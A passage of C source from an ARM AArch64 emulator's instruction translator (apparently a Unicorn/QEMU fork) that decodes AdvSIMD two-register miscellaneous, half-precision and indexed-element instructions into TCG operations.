/* SADDLP, UADDLP */ case 0x6: /* SADALP, UADALP */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_pairwise(s, opcode, u, is_q, size, rn, rd); return; case 0x13: /* SHLL, SHLL2 */ if (u == 0 || size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_shll(s, is_q, size, rn, rd); return; case 0xa: /* CMLT */ if (u == 1) { unallocated_encoding(s); return; } /* fall through */ case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xb: /* ABS, NEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x3: /* SUQADD, USQADD */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_satacc(s, false, u, is_q, size, rn, rd); return; case 0x7: /* SQABS, SQNEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0xc: case 0xd: case 0xe: case 0xf: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: { /* Floating point: U, size[1] and opcode indicate operation; * size[0] indicates single or double precision. */ int is_double = extract32(size, 0, 1); opcode |= (extract32(size, 1, 1) << 5) | (u << 6); size = is_double ? 3 : 2; switch (opcode) { case 0x2f: /* FABS */ case 0x6f: /* FNEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { bool is_signed = (opcode == 0x1d) ? true : false; int elements = is_double ? 2 : is_q ? 4 : 2; if (is_double && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, is_signed, 0, size); return; } case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } handle_2misc_fcmp_zero(s, opcode, false, u, is_q, size, rn, rd); return; case 0x7f: /* FSQRT */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ need_fpstatus = true; need_rmode = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x5c: /* FCVTAU */ case 0x1c: /* FCVTAS */ need_fpstatus = true; need_rmode = true; rmode = FPROUNDING_TIEAWAY; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x3c: /* URECPE */ if (size == 3) { unallocated_encoding(s); return; } /* fall through */ case 0x3d: /* FRECPE */ case 0x7d: /* FRSQRTE */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_reciprocal(s, opcode, false, u, is_q, size, rn, rd); return; case 0x56: /* FCVTXN, FCVTXN2 */ if (size == 2) { unallocated_encoding(s); return; } /* fall through */ case 0x16: /* FCVTN, FCVTN2 */ /* handle_2misc_narrow does a 2*size -> size operation, but these * instructions encode the source size rather than dest size. */ if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, false, opcode, 0, is_q, size - 1, rn, rd); return; case 0x17: /* FCVTL, FCVTL2 */ if (!fp_access_check(s)) { return; } handle_2misc_widening(s, opcode, is_q, size, rn, rd); return; case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ need_rmode = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); /* fall through */ case 0x59: /* FRINTX */ case 0x79: /* FRINTI */ need_fpstatus = true; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x58: /* FRINTA */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; need_fpstatus = true; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x7c: /* URSQRTE */ if (size == 3) { unallocated_encoding(s); return; } need_fpstatus = true; break; case 0x1e: /* FRINT32Z */ case 0x1f: /* FRINT64Z */ need_rmode = true; rmode = FPROUNDING_ZERO; /* fall through */ case 0x5e: /* FRINT32X */ case 0x5f: /* FRINT64X */ need_fpstatus = true; if ((size == 3 && !is_q) || !dc_isar_feature(aa64_frint, s)) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } break; } default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (need_fpstatus || need_rmode) { tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, false); } else { tcg_fpstatus = NULL; } if (need_rmode) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } else { tcg_rmode = NULL; } switch (opcode) { case 0x5: if (u && size == 0) { /* NOT */ gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_not, 0); return; } break; case 0xb: if (u) { /* ABS, NEG */ gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_neg, size); } else { gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_abs, size); } return; } if (size == 3) { /* All 64-bit element operations can be shared with scalar 2misc */ int pass; /* Coverity claims (size == 3 && !is_q) has been eliminated * from all paths leading to here. */ tcg_debug_assert(is_q); for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); handle_2misc_64(s, opcode, u, tcg_res, tcg_op, tcg_rmode, tcg_fpstatus); write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); } } else { int pass; for (pass = 0; pass < (is_q ? 4 : 2); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGCond cond; read_vec_element_i32(s, tcg_op, rn, pass, MO_32); if (size == 2) { /* Special cases for 32 bit elements */ switch (opcode) { case 0xa: /* CMLT */ /* 32 bit integer comparison against zero, result is * test ? (2^32 - 1) : 0. We implement via setcond(test) * and inverting. */ cond = TCG_COND_LT; do_cmop: tcg_gen_setcondi_i32(tcg_ctx, cond, tcg_res, tcg_op, 0); tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_res); break; case 0x8: /* CMGT, CMGE */ cond = u ? TCG_COND_GE : TCG_COND_GT; goto do_cmop; case 0x9: /* CMEQ, CMLE */ cond = u ? TCG_COND_LE : TCG_COND_EQ; goto do_cmop; case 0x4: /* CLS */ if (u) { tcg_gen_clzi_i32(tcg_ctx, tcg_res, tcg_op, 32); } else { tcg_gen_clrsb_i32(tcg_ctx, tcg_res, tcg_op); } break; case 0x7: /* SQABS, SQNEG */ if (u) { gen_helper_neon_qneg_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); } else { gen_helper_neon_qabs_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); } break; case 0x2f: /* FABS */ gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); break; case 0x6f: /* FNEG */ gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); break; case 0x7f: /* FSQRT */ gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_op, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_op, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_rints(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x7c: /* URSQRTE */ gen_helper_rsqrte_u32(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x1e: /* FRINT32Z */ case 0x5e: /* FRINT32X */ gen_helper_frint32_s(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x1f: /* FRINT64Z */ case 0x5f: /* FRINT64X */ gen_helper_frint64_s(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } } else { /* Use helpers for 8 and 16 bit elements */ switch (opcode) { case 0x5: /* CNT, RBIT */ /* For these two insns size is part of the opcode specifier * (handled earlier); they always operate on byte elements. */ if (u) { gen_helper_neon_rbit_u8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_cnt_u8(tcg_ctx, tcg_res, tcg_op); } break; case 0x7: /* SQABS, SQNEG */ { NeonGenOneOpEnvFn *genfn; static NeonGenOneOpEnvFn * const fns[2][2] = { { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, }; genfn = fns[size][u]; genfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); break; } case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xa: /* CMLT */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_s16 }, { gen_helper_neon_cge_s8, gen_helper_neon_cge_s16 }, { gen_helper_neon_ceq_u8, gen_helper_neon_ceq_u16 }, }; NeonGenTwoOpFn *genfn; int comp; bool reverse; TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); /* comp = index into [CMGT, CMGE, CMEQ, CMLE, CMLT] */ comp = (opcode - 0x8) * 2 + u; /* ...but LE, LT are implemented as reverse GE, GT */ reverse = (comp > 2); if (reverse) { comp = 4 - comp; } genfn = fns[comp][size]; if (reverse) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero); } tcg_temp_free_i32(tcg_ctx, tcg_zero); break; } case 0x4: /* CLS, CLZ */ if (u) { if (size == 0) { gen_helper_neon_clz_u8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_clz_u16(tcg_ctx, tcg_res, tcg_op); } } else { if (size == 0) { gen_helper_neon_cls_s8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_cls_s16(tcg_ctx, tcg_res, tcg_op); } } break; default: g_assert_not_reached(); } } write_vec_element_i32(s, tcg_res, rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } } clear_vec_high(s, is_q, rd); if (need_rmode) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } if (need_fpstatus) { tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* AdvSIMD [scalar] two register miscellaneous (FP16) * * 31 30 29 28 27 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+---+---------+---+-------------+--------+-----+------+------+ * | 0 | Q | U | S | 1 1 1 0 | a | 1 1 1 1 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+---+---------+---+-------------+--------+-----+------+------+ * mask: 1000 1111 0111 1110 0000 1100 0000 0000 0x8f7e 0c00 * val: 0000 1110 0111 1000 0000 1000 0000 0000 0x0e78 0800 * * This actually covers two groups where scalar access is governed by * bit 28. A bunch of the instructions (float to integral) only exist * in the vector form and are un-allocated for the scalar decode. Also * in the scalar decode Q is always 1. */ static void disas_simd_two_reg_misc_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int fpop, opcode, a, u; int rn, rd; bool is_q; bool is_scalar; bool only_in_vector = false; int pass; TCGv_i32 tcg_rmode = NULL; TCGv_ptr tcg_fpstatus = NULL; bool need_rmode = false; bool need_fpst = true; int rmode; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } rd = extract32(insn, 0, 5); rn = extract32(insn, 5, 5); a = extract32(insn, 23, 1); u = extract32(insn, 29, 1); is_scalar = extract32(insn, 28, 1); is_q = extract32(insn, 30, 1); opcode = extract32(insn, 12, 5); fpop = deposit32(opcode, 5, 1, a); fpop = deposit32(fpop, 6, 1, u); rd = extract32(insn, 0, 5); rn = extract32(insn, 5, 5); switch (fpop) { case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { int elements; if (is_scalar) { elements = 1; } else { elements = (is_q ? 8 : 4); } if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, !u, 0, MO_16); return; } break; case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ handle_2misc_fcmp_zero(s, fpop, is_scalar, 0, is_q, MO_16, rn, rd); return; case 0x3d: /* FRECPE */ case 0x3f: /* FRECPX */ break; case 0x18: /* FRINTN */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_TIEEVEN; break; case 0x19: /* FRINTM */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_NEGINF; break; case 0x38: /* FRINTP */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_POSINF; break; case 0x39: /* FRINTZ */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_ZERO; break; case 0x58: /* FRINTA */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_TIEAWAY; break; case 0x59: /* FRINTX */ case 0x79: /* FRINTI */ only_in_vector = true; /* current rounding mode */ break; case 0x1a: /* FCVTNS */ need_rmode = true; rmode = FPROUNDING_TIEEVEN; break; case 0x1b: /* FCVTMS */ need_rmode = true; rmode = FPROUNDING_NEGINF; break; case 0x1c: /* FCVTAS */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; break; case 0x3a: /* FCVTPS */ need_rmode = true; rmode = FPROUNDING_POSINF; break; case 0x3b: /* FCVTZS */ need_rmode = true; rmode = FPROUNDING_ZERO; break; case 0x5a: /* FCVTNU */ need_rmode = true; rmode = FPROUNDING_TIEEVEN; break; case 0x5b: /* FCVTMU */ need_rmode = true; rmode = FPROUNDING_NEGINF; break; case 0x5c: /* FCVTAU */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; break; case 0x7a: /* FCVTPU */ need_rmode = true; rmode = FPROUNDING_POSINF; break; case 0x7b: /* FCVTZU */ need_rmode = true; rmode = FPROUNDING_ZERO; break; case 0x2f: /* FABS */ case 0x6f: /* FNEG */ need_fpst = false; break; case 0x7d: /* FRSQRTE */ case 0x7f: /* FSQRT (vector) */ break; default: fprintf(stderr, "%s: insn %#04x fpop %#2x\n", __func__, insn, fpop); g_assert_not_reached(); } /* Check additional constraints for the scalar encoding */ if (is_scalar) { if (!is_q) { unallocated_encoding(s); return; } /* FRINTxx is only in the vector form */ if (only_in_vector) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } if (need_rmode || need_fpst) { tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, true); } if (need_rmode) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } if (is_scalar) { TCGv_i32 tcg_op = read_fp_hreg(s, rn); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpop) { case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ gen_helper_advsimd_f16tosinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ gen_helper_advsimd_f16touinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x6f: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } /* limit any sign extension going on */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0xffff); write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } else { for (pass = 0; pass < (is_q ? 8 : 4); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, MO_16); switch (fpop) { case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ gen_helper_advsimd_f16tosinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ gen_helper_advsimd_f16touinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_advsimd_rinth_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x2f: /* FABS */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_op, 0x7fff); break; case 0x6f: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x7f: /* FSQRT */ gen_helper_sqrt_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } write_vec_element_i32(s, tcg_res, rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } clear_vec_high(s, is_q, rd); } if (tcg_rmode) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } if (tcg_fpstatus) { tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* AdvSIMD scalar x indexed element * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ * | 0 1 | U | 1 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ * AdvSIMD vector x indexed element * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ * | 0 | Q | U | 0 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ */ static void disas_simd_indexed(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This encoding has two kinds of instruction: * normal, where we perform elt x idxelt => elt for each * element in the vector * long, where we perform elt x idxelt and generate a result of * double the width of the input element * The long ops have a 'part' specifier (ie come in INSN, INSN2 pairs). */ bool is_scalar = extract32(insn, 28, 1); bool is_q = extract32(insn, 30, 1); bool u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int l = extract32(insn, 21, 1); int m = extract32(insn, 20, 1); /* Note that the Rm field here is only 4 bits, not 5 as it usually is */ int rm = extract32(insn, 16, 4); int opcode = extract32(insn, 12, 4); int h = extract32(insn, 11, 1); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool is_long = false; int is_fp = 0; bool is_fp16 = false; int index; TCGv_ptr fpst; switch (16 * u + opcode) { case 0x08: /* MUL */ case 0x10: /* MLA */ case 0x14: /* MLS */ if (is_scalar) { unallocated_encoding(s); return; } break; case 0x02: /* SMLAL, SMLAL2 */ case 0x12: /* UMLAL, UMLAL2 */ case 0x06: /* SMLSL, SMLSL2 */ case 0x16: /* UMLSL, UMLSL2 */ case 0x0a: /* SMULL, SMULL2 */ case 0x1a: /* UMULL, UMULL2 */ if (is_scalar) { unallocated_encoding(s); return; } is_long = true; break; case 0x03: /* SQDMLAL, SQDMLAL2 */ case 0x07: /* SQDMLSL, SQDMLSL2 */ case 0x0b: /* SQDMULL, SQDMULL2 */ is_long = true; break; case 0x0c: /* SQDMULH */ case 0x0d: /* SQRDMULH */ break; case 0x01: /* FMLA */ case 0x05: /* FMLS */ case 0x09: /* FMUL */ case 0x19: /* FMULX */ is_fp = 1; break; case 0x1d: /* SQRDMLAH */ case 0x1f: /* SQRDMLSH */ if (!dc_isar_feature(aa64_rdm, s)) { unallocated_encoding(s); return; } break; case 0x0e: /* SDOT */ case 0x1e: /* UDOT */ if (is_scalar || size != MO_32 || !dc_isar_feature(aa64_dp, s)) { unallocated_encoding(s); return; } break; case 0x11: /* FCMLA #0 */ case 0x13: /* FCMLA #90 */ case 0x15: /* FCMLA #180 */ case 0x17: /* FCMLA #270 */ if (is_scalar || !dc_isar_feature(aa64_fcma, s)) { unallocated_encoding(s); return; } is_fp = 2; break; case 0x00: /* FMLAL */ case 0x04: /* FMLSL */ case 0x18: /* FMLAL2 */ case 0x1c: /* FMLSL2 */ if (is_scalar || size != MO_32 || !dc_isar_feature(aa64_fhm, s)) { unallocated_encoding(s); return; } size = MO_16; /* is_fp, but we pass tcg_ctx->cpu_env not fp_status. */ break; default: unallocated_encoding(s); return; } switch (is_fp) { case 1: /* normal fp */ /* convert insn encoded size to MemOp size */ switch (size) { case 0: /* half-precision */ size = MO_16; is_fp16 = true; break; case MO_32: /* single precision */ case MO_64: /* double precision */ break; default: unallocated_encoding(s); return; } break; case 2: /* complex fp */ /* Each indexable element is a complex pair. */ size += 1; switch (size) { case MO_32: if (h && !is_q) { unallocated_encoding(s); return; } is_fp16 = true; break; case MO_64: break; default: unallocated_encoding(s); return; } break; default: /* integer */ switch (size) { case MO_8: case MO_64: unallocated_encoding(s); return; } break; } if (is_fp16 && !dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } /* Given MemOp size, adjust register and indexing. */ switch (size) { case MO_16: index = h << 2 | l << 1 | m; break; case MO_32: index = h << 1 | l; rm |= m << 4; break; case MO_64: if (l || !is_q) { unallocated_encoding(s); return; } index = h; rm |= m << 4; break; default: g_assert_not_reached(); } if (!fp_access_check(s)) { return; } if (is_fp) { fpst = get_fpstatus_ptr(tcg_ctx, is_fp16); } else { fpst = NULL; } switch (16 * u + opcode) { case 0x0e: /* SDOT */ case 0x1e: /* UDOT */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, index, u ? gen_helper_gvec_udot_idx_b : gen_helper_gvec_sdot_idx_b); return; case 0x11: /* FCMLA #0 */ case 0x13: /* FCMLA #90 */ case 0x15: /* FCMLA #180 */ case 0x17: /* FCMLA #270 */ { int rot = extract32(insn, 13, 2); int data = (index << 2) | rot; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), fpst, is_q ? 16 : 8, vec_full_reg_size(s), data, size == MO_64 ? gen_helper_gvec_fcmlas_idx : gen_helper_gvec_fcmlah_idx); tcg_temp_free_ptr(tcg_ctx, fpst); } return; case 0x00: /* FMLAL */ case 0x04: /* FMLSL */ case 0x18: /* FMLAL2 */ case 0x1c: /* FMLSL2 */ { int is_s = extract32(opcode, 2, 1); int is_2 = u; int data = (index << 2) | (is_2 << 1) | is_s; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), data, gen_helper_gvec_fmlal_idx_a64); } return; } if (size == 3) { TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); int pass; assert(is_fp && is_q && !is_long); read_vec_element(s, tcg_idx, rm, index, MO_64); for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); switch (16 * u + opcode) { case 0x05: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negd(tcg_ctx, tcg_op, tcg_op); /* fall through */ case 0x01: /* FMLA */ read_vec_element(s, tcg_res, rd, pass, MO_64); gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); break; case 0x09: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; case 0x19: /* FMULX */ gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } tcg_temp_free_i64(tcg_ctx, tcg_idx); clear_vec_high(s, !is_scalar, rd); } else if (!is_long) { /* 32 bit floating point, or 16 or 32 bit integer. * For the 16 bit scalar case we use the usual Neon helpers and * rely on the fact that 0 op 0 == 0 with no side effects. */ TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 4 : 2; } read_vec_element_i32(s, tcg_idx, rm, index, size); if (size == 1 && !is_scalar) { /* The simplest way to handle the 16x16 indexed ops is to duplicate * the index into both halves of the 32 bit tcg_idx and then use * the usual Neon helpers. */ tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); } for (pass = 0; pass < maxpasses; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, is_scalar ? size : MO_32); switch (16 * u + opcode) { case 0x08: /* MUL */ case 0x10: /* MLA */ case 0x14: /* MLS */ { static NeonGenTwoOpFn * const fns[2][2] = { { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, { tcg_gen_add_i32, tcg_gen_sub_i32 }, }; NeonGenTwoOpFn *genfn; bool is_sub = opcode == 0x4; if (size == 1) { gen_helper_neon_mul_u16(tcg_ctx, tcg_res, tcg_op, tcg_idx); } else { tcg_gen_mul_i32(tcg_ctx, tcg_res, tcg_op, tcg_idx); } if (opcode == 0x8) { break; } read_vec_element_i32(s, tcg_op, rd, pass, MO_32); genfn = fns[size - 1][is_sub]; genfn(tcg_ctx, tcg_res, tcg_op, tcg_res); break; } case 0x05: /* FMLS */ case 0x01: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? size : MO_32); switch (size) { case 1: if (opcode == 0x5) { /* As usual for ARM, separate negation for fused * multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op, tcg_op, 0x80008000); } if (is_scalar) { gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); } else { gen_helper_advsimd_muladd2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); } break; case 2: if (opcode == 0x5) { /* As usual for ARM, separate negation for * fused multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op, tcg_op, 0x80000000); } gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); break; default: g_assert_not_reached(); } break; case 0x09: /* FMUL */ switch (size) { case 1: if (is_scalar) { gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } else { gen_helper_advsimd_mul2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } break; case 2: gen_helper_vfp_muls(tcg_ctx, tcg_res, 